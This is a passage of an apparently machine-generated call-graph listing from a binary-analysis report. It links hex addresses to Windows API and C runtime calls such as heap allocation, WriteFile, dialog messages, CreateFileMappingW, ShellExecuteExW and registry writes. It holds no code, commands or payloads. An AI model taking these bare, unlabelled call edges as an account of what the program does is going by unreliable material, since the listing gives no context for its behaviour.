18787->18949 18790 41eb63 __lock 63 API calls 18791 41e4b2 18790->18791 18952 421d6d InterlockedIncrement 18791->18952 18793 41e4d0 18964 41e4f2 18793->18964 18795 41e4dd __mtinitlocknum 18795->18755 18798 41a092 __mtinitlocknum 18796->18798 18797 41a10b __dosmaperr __mtinitlocknum 18797->18756 18798->18797 18799 41eb63 __lock 65 API calls 18798->18799 18808 41a0d1 18798->18808 18805 41a0a9 ___sbh_find_block 18799->18805 18800 41a0e6 RtlFreeHeap 18800->18797 18801 41a0f8 18800->18801 18802 41e96e __fptostr 65 API calls 18801->18802 18803 41a0fd GetLastError 18802->18803 18803->18797 18804 41a0c3 18976 41a0dc 18804->18976 18805->18804 18969 41ebc6 18805->18969 18808->18797 18808->18800 18810 424f93 __mtinitlocknum 18809->18810 18811 424fab 18810->18811 18821 424fca _memset 18810->18821 18812 41e96e __fptostr 66 API calls 18811->18812 18813 424fb0 18812->18813 18815 41fcc3 __fptostr 6 API calls 18813->18815 18814 42503c HeapAlloc 18814->18821 18818 424fc0 __mtinitlocknum 18815->18818 18818->18764 18821->18814 18821->18818 18822 41eb63 18821->18822 18829 41f375 18821->18829 18835 425083 18821->18835 18838 41f85b 18821->18838 18823 41eb78 18822->18823 18824 41eb8b EnterCriticalSection 18822->18824 18841 41eaa0 18823->18841 18824->18821 18826 41eb7e 18826->18824 18867 421055 18826->18867 18832 41f3a3 18829->18832 18830 41f445 18830->18821 18832->18830 18834 41f43c 18832->18834 18932 41eedc 18832->18932 18834->18830 18939 41ef8c 18834->18939 18943 41ea89 LeaveCriticalSection 18835->18943 18837 42508a 18837->18821 18839 41e328 __decode_pointer 6 API calls 18838->18839 18840 41f86b 18839->18840 18840->18821 18842 41eaac __mtinitlocknum 18841->18842 18843 41ead2 18842->18843 18874 421508 18842->18874 18849 41eae2 __mtinitlocknum 18843->18849 18920 420ea3 18843->18920 18849->18826 18850 41eac8 18917 4210a9 18850->18917 18851 41eb03 18853 41eb63 __lock 67 API calls 18851->18853 18852 41eaf4 18855 41e96e __fptostr 67 API calls 18852->18855 18856 41eb0a 18853->18856 18855->18849 18857 41eb12 18856->18857 18858 41eb3e 18856->18858 18925 423da6 18857->18925 18860 41a086 __setenvp 67 API calls 18858->18860 18866 41eb2f 18860->18866 18861 41eb1d 18863 41a086 __setenvp 67 API calls 18861->18863 18861->18866 18864 41eb29 18863->18864 18865 41e96e __fptostr 67 API calls 18864->18865 18865->18866 18929 41eb5a 18866->18929 18868 421508 __FF_MSGBANNER 67 API calls 18867->18868 18869 42105f 18868->18869 18870 42135d __NMSG_WRITE 67 API calls 18869->18870 18871 421067 18870->18871 18872 41e328 __decode_pointer 6 API calls 18871->18872 18873 41eb8a 18872->18873 18873->18824 18875 425567 __set_error_mode 67 API calls 18874->18875 18876 42150f 18875->18876 18877 425567 __set_error_mode 67 API calls 18876->18877 18879 42151c 18876->18879 18877->18879 18878 42135d __NMSG_WRITE 67 API calls 18880 421534 18878->18880 18879->18878 18881 41eac1 18879->18881 18882 42135d __NMSG_WRITE 67 API calls 18880->18882 18883 42135d 18881->18883 18882->18881 18884 421371 18883->18884 18885 425567 __set_error_mode 64 API calls 18884->18885 18916 4214cc 18884->18916 18886 421393 18885->18886 18887 4214d1 GetStdHandle 18886->18887 18889 425567 __set_error_mode 64 API calls 18886->18889 18888 4214df _strlen 18887->18888 18887->18916 18892 4214f8 WriteFile 18888->18892 18888->18916 18890 4213a4 18889->18890 18890->18887 18891 4213b6 18890->18891 18893 422456 _strcpy_s 64 API calls 18891->18893 18891->18916 18892->18916 18894 4213d8 18893->18894 18895 4213ec GetModuleFileNameA 18894->18895 18896 41fb9b __invoke_watson 10 API calls 18894->18896 18897 42140a 18895->18897 18901 42142d _strlen 18895->18901 18898 4213e9 18896->18898 18899 422456 _strcpy_s 64 API calls 18897->18899 18898->18895 18900 42141a 18899->18900 18900->18901 18902 41fb9b __invoke_watson 10 API calls 18900->18902 18904 4254b2 __NMSG_WRITE 64 API calls 18901->18904 18913 421470 18901->18913 18902->18901 18903 42543e _strcat_s 64 API calls 18905 421483 18903->18905 18907 42145d 18904->18907 18908 41fb9b __invoke_watson 10 API calls 18905->18908 18911 421494 18905->18911 18906 42543e _strcat_s 64 API calls 18909 4214a8 18906->18909 18910 41fb9b __invoke_watson 10 API calls 18907->18910 18907->18913 18908->18911 18912 4214b9 18909->18912 18914 41fb9b __invoke_watson 10 API calls 18909->18914 18910->18913 18911->18906 18915 4252d5 ___crtMessageBoxW 16 API calls 18912->18915 18913->18903 18914->18912 18915->18916 18916->18850 18918 42107e ___crtCorExitProcess GetModuleHandleW GetProcAddress 18917->18918 18919 4210b6 ExitProcess 18918->18919 18923 420eac 18920->18923 18921 41cafe _malloc 66 API calls 18921->18923 18922 41eaed 18922->18851 18922->18852 18923->18921 18923->18922 18924 420ec3 Sleep 18923->18924 18924->18923 18926 41f65c __mtinitlocknum 18925->18926 18927 423db2 InitializeCriticalSectionAndSpinCount 18926->18927 18928 423df6 __mtinitlocknum 18927->18928 18928->18861 18930 41ea89 _doexit LeaveCriticalSection 18929->18930 18931 41eb61 18930->18931 18931->18849 18933 41ef23 HeapAlloc 18932->18933 18934 41eeef HeapReAlloc 18932->18934 18936 41ef0d 18933->18936 18937 41ef46 VirtualAlloc 18933->18937 18935 41ef11 18934->18935 18934->18936 18935->18933 18936->18834 18937->18936 18938 41ef60 HeapFree 18937->18938 18938->18936 18940 41efa3 VirtualAlloc 18939->18940 18942 41efea 18940->18942 18942->18830 18943->18837 18945 421030 Sleep GetModuleHandleW 18944->18945 18946 41e377 18945->18946 18947 42104e 18945->18947 18946->18772 18946->18775 18947->18945 18947->18946 18948->18780 18967 41ea89 LeaveCriticalSection 18949->18967 18951 41e4ab 18951->18790 18953 421d8b InterlockedIncrement 18952->18953 18954 421d8e 18952->18954 18953->18954 18955 421d9b 18954->18955 18956 421d98 InterlockedIncrement 18954->18956 18957 421da5 InterlockedIncrement 18955->18957 18958 421da8 18955->18958 18956->18955 18957->18958 18959 421db2 InterlockedIncrement 18958->18959 18961 421db5 18958->18961 18959->18961 18960 421dce InterlockedIncrement 18960->18961 18961->18960 18962 421dde InterlockedIncrement 18961->18962 18963 421de9 InterlockedIncrement 18961->18963 18962->18961 18963->18793 18968 41ea89 LeaveCriticalSection 18964->18968 18966 41e4f9 18966->18795 18967->18951 18968->18966 18970 41ec05 18969->18970 18972 41eea7 18969->18972 18971 41edf1 VirtualFree 18970->18971 18970->18972 18973 41ee55 18971->18973 18972->18804 18973->18972 18974 41ee64 VirtualFree HeapFree 18973->18974 18979 41c710 18974->18979 18983 41ea89 LeaveCriticalSection 18976->18983 18978 41a0e3 18978->18808 18980 41c728 18979->18980 18981 41c74f __VEC_memcpy 18980->18981 18982 41c757 18980->18982 18981->18982 18982->18972 18983->18978 18985 4249c6 18984->18985 18989 41fa38 18984->18989 18986 41e96e __fptostr 67 API calls 18985->18986 18987 4249cb 18986->18987 18988 41fcc3 __fptostr 6 API calls 18987->18988 18988->18989 18989->18725 18989->18726 18991 424960 18990->18991 18992 42496f 18990->18992 18993 41e96e __fptostr 67 API calls 18991->18993 18995 424993 18992->18995 18996 41e96e __fptostr 67 API calls 18992->18996 18994 424965 18993->18994 18994->18739 18995->18739 18997 424983 18996->18997 18998 41fcc3 __fptostr 6 API calls 18997->18998 18998->18995 19000 420ea3 __malloc_crt 67 API calls 18999->19000 19001 42491f 19000->19001 19001->18742 19003 42483a __mtinitlocknum 19002->19003 19004 424842 19003->19004 19005 42485d 19003->19005 19059 41e981 19004->19059 19007 42486b 19005->19007 19010 4248ac 19005->19010 19009 41e981 __commit 67 API calls 19007->19009 19012 424870 19009->19012 19062 426406 19010->19062 19011 41e96e __fptostr 67 API calls 19014 42484f __mtinitlocknum 19011->19014 19015 41e96e __fptostr 67 API calls 19012->19015 19014->18731 19016 424877 19015->19016 19018 41fcc3 __fptostr 6 API calls 19016->19018 19017 4248b2 19019 4248d5 19017->19019 19020 4248bf 19017->19020 19018->19014 19022 41e96e __fptostr 67 API calls 19019->19022 19072 4240fb 19020->19072 19024 4248da 19022->19024 19023 4248cd 19131 424900 19023->19131 19025 41e981 __commit 67 API calls 19024->19025 19025->19023 19028 423fee __mtinitlocknum 19027->19028 19029 42401b 19028->19029 19030 423fff 19028->19030 19031 424029 19029->19031 19033 42404a 19029->19033 19032 41e981 __commit 67 API calls 19030->19032 19034 41e981 __commit 67 API calls 19031->19034 19035 424004 19032->19035 19038 424090 19033->19038 19039 42406a 19033->19039 19037 42402e 19034->19037 19036 41e96e __fptostr 67 API calls 19035->19036 19040 42400c __mtinitlocknum 19036->19040 19042 41e96e __fptostr 67 API calls 19037->19042 19041 426406 ___lock_fhandle 68 API calls 19038->19041 19043 41e981 __commit 67 API calls 19039->19043 19040->18731 19044 424096 19041->19044 19045 424035 19042->19045 19046 42406f 19043->19046 19048 4240a3 19044->19048 19049 4240bf 19044->19049 19050 41fcc3 __fptostr 6 API calls 19045->19050 19047 41e96e __fptostr 67 API calls 19046->19047 19051 424076 19047->19051 19052 423f5d __lseeki64_nolock 69 API calls 19048->19052 19053 41e96e __fptostr 67 API calls 19049->19053 19050->19040 19054 41fcc3 __fptostr 6 API calls 19051->19054 19056 4240b4 19052->19056 19055 4240c4 19053->19055 19054->19040 19057 41e981 __commit 67 API calls 19055->19057 19226 4240f1 19056->19226 19057->19056 19060 41e4fb __getptd_noexit 67 API calls 19059->19060 19061 41e986 19060->19061 19061->19011 19063 426412 __mtinitlocknum 19062->19063 19064 42646d 19063->19064 19067 41eb63 __lock 67 API calls 19063->19067 19065 426472 EnterCriticalSection 19064->19065 19066 42648f __mtinitlocknum 19064->19066 19065->19066 19066->19017 19068 42643e 19067->19068 19069 426455 19068->19069 19071 423da6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 19068->19071 19134 42649d 19069->19134 19071->19069 19073 42410a __write_nolock 19072->19073 19074 424163 19073->19074 19075 42413c 19073->19075 19105 424131 19073->19105 19078 4241cb 19074->19078 19079 4241a5 19074->19079 19077 41e981 __commit 67 API calls 19075->19077 19081 424141 19077->19081 19083 4241df 19078->19083 19138 423f5d 19078->19138 19082 41e981 __commit 67 API calls 19079->19082 19080 42482c 19080->19023 19084 41e96e __fptostr 67 API calls 19081->19084 19085 4241aa 19082->19085 19088 424953 __flswbuf 67 API calls 19083->19088 19087 424148 19084->19087 19089 41e96e __fptostr 67 API calls 19085->19089 19090 41fcc3 __fptostr 6 API calls 19087->19090 19091 4241ea 19088->19091 19092 4241b3 19089->19092 19090->19105 19093 424490 19091->19093 19148 41e574 19091->19148 19094 41fcc3 __fptostr 6 API calls 19092->19094 19096 4244a0 19093->19096 19097 42475f WriteFile 19093->19097 19094->19105 19098 42457e 19096->19098 19120 4244b4 19096->19120 19100 424792 GetLastError 19097->19100 19101 424472 19097->19101 19119 42465e 19098->19119 19123 42458d 19098->19123 19100->19101 19102 4247dd 19101->19102 19101->19105 19107 4247b0 19101->19107 19102->19105 19106 41e96e __fptostr 67 API calls 19102->19106 19103 424230 19103->19093 19104 424242 GetConsoleCP 19103->19104 19104->19101 19129 424265 19104->19129 19161 41e29e 19105->19161 19109 424800 19106->19109 19111 4247bb 19107->19111 19112 4247cf 19107->19112 19108 424522 WriteFile 19108->19100 19108->19120 19116 41e981 __commit 67 API calls 19109->19116 19110 4246c4 WideCharToMultiByte 19110->19100 19113 4246fb WriteFile 19110->19113 19117 41e96e __fptostr 67 API calls 19111->19117 19156 41e994 19112->19156 19118 424732 GetLastError 19113->19118 19113->19119 19114 424602 WriteFile 19114->19100 19114->19123 19116->19105 19121 4247c0 19117->19121 19118->19119 19119->19101 19119->19102 19119->19110 19119->19113 19120->19101 19120->19102 19120->19108 19122 41e981 __commit 67 API calls 19121->19122 19122->19105 19123->19101 19123->19102 19123->19114 19125 424ca5 79 API calls __fassign 19125->19129 19126 4264cd 11 API calls __putwch_nolock 19126->19129 19127 424311 WideCharToMultiByte 19127->19101 19128 424342 WriteFile 19127->19128 19128->19100 19128->19129 19129->19100 19129->19101 19129->19125 19129->19126 19129->19127 19130 424396 WriteFile 19129->19130 19153 42238b 19129->19153 19130->19100 19130->19129 19225 4264a6 LeaveCriticalSection 19131->19225 19133 424908 19133->19014 19137 41ea89 LeaveCriticalSection 19134->19137 19136 4264a4 19136->19064 19137->19136 19169 42638f 19138->19169 19140 423f7b 19141 423f83 19140->19141 19142 423f94 SetFilePointer 19140->19142 19143 41e96e __fptostr 67 API calls 19141->19143 19144 423fac GetLastError 19142->19144 19145 423f88 19142->19145 19143->19145 19144->19145 19146 423fb6 19144->19146 19145->19083 19147 41e994 __dosmaperr 67 API calls 19146->19147 19147->19145 19149 41e4fb __getptd_noexit 67 API calls 19148->19149 19150 41e57c 19149->19150 19151 41e589 GetConsoleMode 19150->19151 19152 421055 __amsg_exit 67 API calls 19150->19152 19151->19093 19151->19103 19152->19151 19182 422353 19153->19182 19157 41e981 __commit 67 API calls 19156->19157 19158 41e99f __dosmaperr 19157->19158 19159 41e96e __fptostr 67 API calls 19158->19159 19160 41e9b2 19159->19160 19160->19105 19162 41e2a6 19161->19162 19163 41e2a8 IsDebuggerPresent 19161->19163 19162->19080 19224 4249e9 19163->19224 19166 423b10 SetUnhandledExceptionFilter UnhandledExceptionFilter 19167 423b35 GetCurrentProcess TerminateProcess 19166->19167 19168 423b2d __invoke_watson 19166->19168 19167->19080 19168->19167 19170 42639c 19169->19170 19172 4263b4 19169->19172 19171 41e981 __commit 67 API calls 19170->19171 19174 4263a1 19171->19174 19173 41e981 __commit 67 API calls 19172->19173 19175 4263f9 19172->19175 19176 4263e2 19173->19176 19177 41e96e __fptostr 67 API calls 19174->19177 19175->19140 19178 41e96e __fptostr 67 API calls 19176->19178 19179 4263a9 19177->19179 19180 4263e9 19178->19180 19179->19140 19181 41fcc3 __fptostr 6 API calls 19180->19181 19181->19175 19185 41cc88 19182->19185 19186 41cc9b 19185->19186 19192 41cce8 19185->19192 19187 41e574 __getptd 67 API calls 19186->19187 19188 41cca0 19187->19188 19189 41ccc8 19188->19189 19193 421ed3 19188->19193 19189->19192 19208 421767 19189->19208 19192->19129 19194 421edf __mtinitlocknum 19193->19194 19195 41e574 __getptd 67 API calls 19194->19195 19196 421ee4 19195->19196 19197 421f12 19196->19197 19199 421ef6 19196->19199 19198 41eb63 __lock 67 API calls 19197->19198 19200 421f19 19198->19200 19201 41e574 __getptd 67 API calls 19199->19201 19202 421e95 _LocaleUpdate::_LocaleUpdate 75 API calls 19200->19202 19203 421efb 19201->19203 19204 421f2c 19202->19204 19205 421f09 __mtinitlocknum 19203->19205 19207 421055 __amsg_exit 67 API calls 19203->19207 19206 421f3d _LocaleUpdate::_LocaleUpdate LeaveCriticalSection 19204->19206 19205->19189 19206->19203 19207->19205 19209 421773 __mtinitlocknum 19208->19209 19210 41e574 __getptd 67 API calls 19209->19210 19211 421778 19210->19211 19212 41eb63 __lock 67 API calls 19211->19212 19213 42178a 19211->19213 19214 4217a8 19212->19214 19216 421798 __mtinitlocknum 19213->19216 19220 421055 __amsg_exit 67 API calls 19213->19220 19215 4217f1 19214->19215 19217 4217d9 InterlockedIncrement 19214->19217 19218 4217bf InterlockedDecrement 19214->19218 19219 421802 _LocaleUpdate::_LocaleUpdate LeaveCriticalSection 19215->19219 19216->19192 19217->19215 19218->19217 19221 4217ca 19218->19221 19219->19213 19220->19216 19221->19217 19222 41a086 __setenvp 67 API calls 19221->19222 19223 4217d8 19222->19223 19223->19217 19224->19166 19225->19133 19229 4264a6 LeaveCriticalSection 19226->19229 19228 4240f9 19228->19040 19229->19228 19230 4294f0 19235 4054af 19230->19235 19236 4054b9 __EH_prolog 19235->19236 19254 409dae 19236->19254 19241 410979 67 API calls 19242 4054e3 19241->19242 19243 410979 67 API calls 19242->19243 19244 4054f2 19243->19244 19245 410979 67 API calls 19244->19245 19246 405501 19245->19246 19247 410979 67 API calls 19246->19247 19248 405510 19247->19248 19263 405358 19248->19263 19255 409db8 __EH_prolog 19254->19255 19276 40cdd9 19255->19276 19260 410979 19363 4108eb 19260->19363 19264 409d0d 2 API calls 19263->19264 19265 405360 19264->19265 19266 4108eb 67 API calls 19265->19266 19267 40538d 19266->19267 19268 4108eb 67 API calls 19267->19268 19269 405398 19268->19269 19270 4108eb 67 API calls 19269->19270 19271 4053a3 19270->19271 19272 4108eb 67 API calls 19271->19272 19273 4053ae 19272->19273 19274 4108eb 67 API calls 19273->19274 19275 4053b9 19274->19275 19283 40cd26 19276->19283 19278 409dca 19279 409d0d 19278->19279 19280 409d1d _memset 19279->19280 19358 410b1f 19280->19358 19284 40cd4c _wcslen 19283->19284 19285 40cd35 _memset 19283->19285 19287 40ccac 19284->19287 19285->19278 19288 40ccbd ___crtGetEnvironmentStringsA 19287->19288 19291 40cbe8 19288->19291 19292 40cc01 19291->19292 19293 40cbf7 19291->19293 19295 40cc6f GetCurrentProcessId 19292->19295 19297 40cc24 19292->19297 19301 40cba9 19293->19301 19296 40cc51 19295->19296 19296->19285 19297->19296 19305 406381 19297->19305 19299 40cc3f __init_pointers 19310 4062f8 19299->19310 19302 40cbb2 LoadLibraryW 19301->19302 19303 40cbe2 19301->19303 19302->19303 19304 40cbc3 GetProcAddress GetProcAddress 19302->19304 19303->19292 19304->19303 19306 41a577 __vswprintf_c_l 101 API calls 19305->19306 19307 4063a4 19306->19307 19314 4012d0 19307->19314 19312 40629a 19310->19312 19311 4062c6 19311->19296 19312->19311 19355 41c33f 19312->19355 19317 4112c0 19314->19317 19316 4012f5 19316->19299 19318 41131c 19317->19318 19320 4112cf 19317->19320 19318->19316 19319 411365 19328 40c0b2 ctype 104 API calls 19319->19328 19320->19318 19320->19319 19322 41133e 19320->19322 19324 411321 19320->19324 19325 411348 19320->19325 19326 411391 19320->19326 19327 411315 19320->19327 19329 4113ce 19320->19329 19330 4112f4 19320->19330 19321 40c0b2 ctype 104 API calls 19323 41134f 19321->19323 19322->19318 19322->19321 19332 40df74 ctype 116 API calls 19323->19332 19337 40c0b2 ctype 104 API calls 19324->19337 19335 40c0b2 ctype 104 API calls 19325->19335 19331 40c0b2 ctype 104 API calls 19326->19331 19350 40d09d 19327->19350 19328->19330 19329->19318 19329->19322 19329->19324 19329->19325 19341 40df74 19330->19341 19334 4113a1 19331->19334 19332->19318 19338 40df74 ctype 116 API calls 19334->19338 19335->19323 19337->19330 19340 4113a9 19338->19340 19340->19316 19342 40dfc5 19341->19342 19343 40df7d 19341->19343 19342->19316 19343->19342 19344 40df87 GetLastError 19343->19344 19345 41a577 __vswprintf_c_l 101 API calls 19344->19345 19346 40dfac 19345->19346 19347 40d09d ctype 13 API calls 19346->19347 19348 40dfb7 19347->19348 19348->19342 19349 40dfbe SetLastError 19348->19349 19349->19342 19351 40d0aa __write_nolock 19350->19351 19352 40d0d7 19351->19352 19353 40d0b7 wvsprintfW 19351->19353 19352->19318 19354 40cf89 ctype 12 API calls 19353->19354 19354->19352 19356 41c374 RaiseException 19355->19356 19357 41c368 19355->19357 19356->19311 19357->19356 19361 410ae8 GetCurrentProcess GetProcessAffinityMask 19358->19361 19362 4054c5 19361->19362 19362->19260 19366 4125f7 19363->19366 19367 412600 19366->19367 19368 4054d4 19366->19368 19369 41a086 __setenvp 67 API calls 19367->19369 19368->19241 19369->19368 19512 40f277 19513 40f281 __EH_prolog __write_nolock 19512->19513 19673 40608b 19513->19673 19516 40f2c3 19520 40f332 GetDlgItemTextW 19516->19520 19521 40f2cd 19516->19521 19522 40f2ac 19516->19522 19517 40f85a 19518 40f87e 19517->19518 19519 40f86f SendMessageW 19517->19519 19523 40f897 19518->19523 19524 40f887 SendDlgItemMessageW 19518->19524 19519->19518 19526 40f30e 19520->19526 19528 40f366 19520->19528 19525 40f2d0 19521->19525 19521->19526 19749 40d8b2 19523->19749 19524->19523 19525->19522 19535 40c0b2 ctype 104 API calls 19525->19535 19526->19522 19532 40f709 EndDialog 19526->19532 19529 40f37d GetDlgItem 19528->19529 19530 40f36e 19528->19530 19533 40f391 SendMessageW SendMessageW 19529->19533 19534 40f3b7 SetFocus 19529->19534 19539 40f9f3 EndDialog 19530->19539 19543 40f7fd 19530->19543 19532->19522 19533->19534 19537 40f3c8 19534->19537 19552 40f3d4 19534->19552 19538 40f2ea 19535->19538 19541 40c0b2 ctype 104 API calls 19537->19541 19791 4050a4 SHGetMalloc 19538->19791 19539->19522 19540 40f8ce GetDlgItem 19544 40f8e4 19540->19544 19545 40f8ea SetWindowTextW 19540->19545 19546 40f3d2 19541->19546 19548 40c0b2 ctype 104 API calls 19543->19548 19544->19545 19769 419830 GetClassNameW 19545->19769 19679 40cf89 GetDlgItem 19546->19679 19551 40f80e SetDlgItemTextW 19548->19551 19550 40f2f9 SetDlgItemTextW 19550->19522 19556 40f821 19551->19556 19559 40c0b2 ctype 104 API calls 19552->19559 19562 40c0b2 ctype 104 API calls 19556->19562 19558 40f428 19561 40f43c 19558->19561 19795 40d77d 19558->19795 19563 40f406 19559->19563 19560 40f92d 19567 40f961 19560->19567 19571 40c0b2 ctype 104 API calls 19560->19571 19688 4090e7 19561->19688 19564 40f846 19562->19564 19565 401b7b _swprintf 101 API calls 19563->19565 19570 40c0b2 ctype 104 API calls 19564->19570 19565->19546 19566 40e541 154 API calls 19566->19560 19578 40e541 154 API calls 19567->19578 19633 40fa0d _wcscat 19567->19633 19573 40f84d MessageBoxW 19570->19573 19574 40f93f SetDlgItemTextW 19571->19574 19573->19522 19577 40c0b2 ctype 104 API calls 19574->19577 19575 40f450 GetLastError 19576 40f45b 19575->19576 19694 419806 SetCurrentDirectoryW 19576->19694 19583 40f953 SetDlgItemTextW 19577->19583 19584 40f97d 19578->19584 19580 40fab6 19581 40fac9 19580->19581 19582 40fabf EnableWindow 19580->19582 19588 40fae3 19581->19588 19823 406048 GetDlgItem KiUserCallbackDispatcher 19581->19823 19582->19581 19583->19567 19589 40f9b1 19584->19589 19590 40f98e 19584->19590 19585 40f470 19586 40f482 19585->19586 19587 40f477 GetLastError 19585->19587 19596 40f4ff 19586->19596 19598 40f493 GetTickCount 19586->19598 19645 40f4e3 ctype 19586->19645 19587->19586 19594 40fb0e 19588->19594 19608 40fb00 SendMessageW 19588->19608 19609 40fb08 PostMessageW 19588->19609 19592 40fa00 19589->19592 19593 40f9b9 SetForegroundWindow 19589->19593 19808 41961b ShowWindow 19590->19808 19601 40e541 154 API calls 19592->19601 19593->19592 19600 40f9c8 19593->19600 19594->19522 19611 40c0b2 ctype 104 API calls 19594->19611 19595 40f718 19703 406066 GetDlgItem ShowWindow 19595->19703 19603 40f6b0 19596->19603 19604 40f51a GetModuleFileNameW 19596->19604 19605 401b7b _swprintf 101 API calls 19598->19605 19599 40fada 19824 406048 GetDlgItem KiUserCallbackDispatcher 19599->19824 19600->19592 19607 40f9d0 DialogBoxParamW 19600->19607 19601->19633 19612 40c0b2 ctype 104 API calls 19603->19612 19801 40cced 19604->19801 19617 40f4ac 19605->19617 19607->19592 19618 40f9ec 19607->19618 19608->19594 19609->19594 19619 40fb20 SetDlgItemTextW 19611->19619 19621 40f6ba 19612->19621 19614 40fa96 19624 41961b 89 API calls 19614->19624 19615 40f72a 19704 406066 GetDlgItem ShowWindow 19615->19704 19616 41a086 __setenvp 67 API calls 19622 40f9b0 19616->19622 19695 4086bb 19617->19695 19618->19539 19619->19522 19625 401b7b _swprintf 101 API calls 19621->19625 19622->19589 19628 40fab3 19624->19628 19631 40f6d8 19625->19631 19626 401b7b _swprintf 101 API calls 19632 40f56c CreateFileMappingW 19626->19632 19627 40c0b2 ctype 104 API calls 19627->19633 19628->19580 19629 40f733 19705 406048 GetDlgItem KiUserCallbackDispatcher 19629->19705 19642 40c0b2 ctype 104 API calls 19631->19642 19635 40f5cb GetCommandLineW 19632->19635 19636 40f62f ShellExecuteExW 19632->19636 19633->19580 19633->19614 19633->19627 19640 40f5db 19635->19640 19652 40f64c ctype 19636->19652 19637 40f73b 19706 406066 GetDlgItem ShowWindow 19637->19706 19638 40f4d1 19641 40f4d8 GetLastError 19638->19641 19638->19645 19805 40cf03 SHGetMalloc SHGetSpecialFolderLocation SHGetPathFromIDListW 19640->19805 19641->19645 19648 40f6f3 MessageBoxW 19642->19648 19644 40f744 SetDlgItemTextW GetDlgItem 19646 40f762 GetWindowLongW SetWindowLongW 19644->19646 19647 40f77c 19644->19647 19645->19595 19645->19596 19646->19647 19707 40e541 19647->19707 19648->19526 19650 40cf03 3 API calls 19656 40f603 19650->19656 19654 40f686 19652->19654 19655 40f661 WaitForInputIdle 19652->19655 19663 40f699 UnmapViewOfFile CloseHandle 19654->19663 19664 40f6ab 19654->19664 19659 40f671 19655->19659 19657 40cf03 3 API calls 19656->19657 19660 40f60f MapViewOfFile 19657->19660 19658 40e541 154 API calls 19661 40f798 19658->19661 19659->19654 19662 40f678 Sleep 19659->19662 19665 40f62c ___crtGetEnvironmentStringsA 19660->19665 19737 40dfc8 19661->19737 19662->19654 19662->19659 19663->19664 19664->19526 19664->19603 19665->19636 19668 40e541 154 API calls 19671 40f7b1 19668->19671 19669 40f7d7 19807 406048 GetDlgItem KiUserCallbackDispatcher 19669->19807 19671->19669 19672 40e541 154 API calls 19671->19672 19672->19669 19674 406094 19673->19674 19675 4060b8 19673->19675 19677 4060b6 19674->19677 19825 40be4f 19674->19825 19845 40b8fe 19675->19845 19677->19516 19677->19517 19677->19522 19680 40cfb9 19679->19680 19681 40cfeb SendMessageW SendMessageW 19679->19681 19851 418d09 19680->19851 19683 40d03b SendMessageW SendMessageW SendMessageW 19681->19683 19684 40d01f 19681->19684 19686 40d085 SendMessageW 19683->19686 19687 40d067 SendMessageW 19683->19687 19684->19683 19686->19558 19687->19686 19691 4090f4 __write_nolock _wcsncpy 19688->19691 19689 409183 19690 409051 9 API calls 19689->19690 19692 4091a6 19689->19692 19690->19692 19691->19689 19691->19692 19854 409051 19691->19854 19692->19575 19692->19576 19694->19585 19696 4086c8 __write_nolock 19695->19696 19697 408729 19696->19697 19698 40872f CreateFileW 19696->19698 19699 408777 19697->19699 19700 40a5bc 2 API calls 19697->19700 19698->19697 19699->19638 19701 40875c 19700->19701 19701->19699 19702 408760 CreateFileW 19701->19702 19702->19699 19703->19615 19704->19629 19705->19637 19706->19644 19708 40e54b __EH_prolog __write_nolock 19707->19708 19709 40f11b 19708->19709 19908 40d472 19708->19908 19709->19658 19712 40d472 ExpandEnvironmentStringsW 19725 40e580 _wcscat _wcslen _wcsrchr _wcscpy 19712->19725 19713 40e89c SetWindowTextW 19713->19725 19716 41a114 _realloc 72 API calls 19716->19725 19717 40e93a RegOpenKeyExW 19718 40e956 RegQueryValueExW RegCloseKey 19717->19718 19717->19725 19718->19725 19720 41a086 __setenvp 67 API calls 19720->19725 19721 40e688 SetFileAttributesW 19723 40e746 GetFileAttributesW 19721->19723 19735 40e683 _memset _wcslen 19721->19735 19724 40e754 DeleteFileW 19723->19724 19723->19735 19724->19735 19725->19709 19725->19712 19725->19713 19725->19716 19725->19717 19725->19720 19733 40ea91 SendMessageW 19725->19733 19725->19735 19912 4119e6 CompareStringW 19725->19912 19913 40d807 19725->19913 19920 419819 GetCurrentDirectoryW 19725->19920 19921 409396 19725->19921 19930 4091d1 19725->19930 19933 40d61e 19725->19933 19728 409396 7 API calls 19728->19735 19730 401b7b _swprintf 101 API calls 19731 40e786 GetFileAttributesW 19730->19731 19732 40e797 MoveFileW 19731->19732 19731->19735 19734 40e7af MoveFileExW 19732->19734 19732->19735 19733->19725 19734->19735 19735->19721 19735->19725 19735->19728 19735->19730 19736 40e722 SHFileOperationW 19735->19736 19925 40a52d 19735->19925 19736->19723 19738 40dfd2 _wcscpy __EH_prolog __write_nolock 19737->19738 19956 410901 19738->19956 19740 40e003 _wcscpy 19960 40533d 19740->19960 19742 40e021 19964 406f1d 19742->19964 19746 40e06d 19747 40e07c 19746->19747 19979 406e41 19746->19979 19747->19668 19750 40d8bf __write_nolock 19749->19750 21577 4199d4 19750->21577 19753 40d9a2 GetDlgItem SendMessageW 19768 419819 GetCurrentDirectoryW 19753->19768 19754 40d8cc GetWindow 19754->19753 19757 40d8e9 19754->19757 19755 40d8fe GetClassNameW 21582 4119e6 CompareStringW 19755->21582 19757->19753 19757->19755 19758 40d926 GetWindowLongW 19757->19758 19759 40d987 GetWindow 19757->19759 19758->19759 19760 40d936 SendMessageW 19758->19760 19759->19753 19759->19757 19760->19759 19761 40d948 GetObjectW 19760->19761 21583 419991 19761->21583 19763 40d95d 21587 41994e 19763->21587 21591 419a1e 19763->21591 19767 40d980 DeleteObject 19767->19759 19768->19540 19770 419851 19769->19770 19775 419876 19769->19775 21608 4119e6 CompareStringW 19770->21608 19772 40f8fc 19777 40e449 19772->19777 19773 41987b SHAutoComplete 19773->19772 19774 419864 19774->19775 19776 419868 FindWindowExW 19774->19776 19775->19772 19775->19773 19776->19775 19778 40e453 __EH_prolog __write_nolock 19777->19778 19779 401851 133 API calls 19778->19779 19780 40e475 19779->19780 21609 401a49 19780->21609 19785 40e4ee 19788 401228 ctype 131 API calls 19785->19788 19786 41cafe _malloc 67 API calls 19789 40e4bb ___crtGetEnvironmentStringsA 19786->19789 19787 41a086 __setenvp 67 API calls 19787->19785 19790 40e4fd 19788->19790 19789->19785 19789->19787 19790->19560 19790->19566 19792 4050bb 19791->19792 19793 4050bf SHBrowseForFolderW 19791->19793 19792->19522 19792->19550 19793->19792 19794 4050fc SHGetPathFromIDListW 19793->19794 19794->19792 19797 40d78a __write_nolock 19795->19797 19796 40d802 19796->19561 19797->19796 19798 40d7af RegCreateKeyExW 19797->19798 19798->19796 19799 40d7d5 _wcslen 19798->19799 19800 40d7dd RegSetValueExW RegCloseKey 